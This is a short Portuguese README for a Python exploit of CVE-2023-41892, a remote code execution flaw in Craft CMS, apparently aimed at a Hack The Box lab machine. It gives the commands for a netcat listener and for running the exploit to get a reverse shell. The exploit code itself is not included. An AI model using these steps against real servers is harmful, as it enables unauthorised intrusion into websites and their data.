
CVE-2023-41892 Reverse Shell
Este script Python explora a vulnerabilidade de Execução Remota de Código (CVE-2023-41892) do Craft CMS, que é um popular sistema de gerenciamento de conteúdo. As versões entre 4.0.0-RC1 e 4.4.14 são afetadas por esta vulnerabilidade, permitindo que atacantes executem código arbitrário remotamente, como um PHP reverse shell.
Primeiro, inicie um listener netcat em outro shell:
nc -nlvp 1234
Em seguida, verifique seu endereço IP e execute o exploit:
python3 exploit.py -r 10.10.16.47 -p 1234 http://surveillance.htb
Feliz hacking com seu novo reverse shell!
Este código é destinado apenas para fins de hacking ético e não deve ser usado para atividades maliciosas!
Agradecimentos a to016 pelo código original que pode ser encontrado neste Gist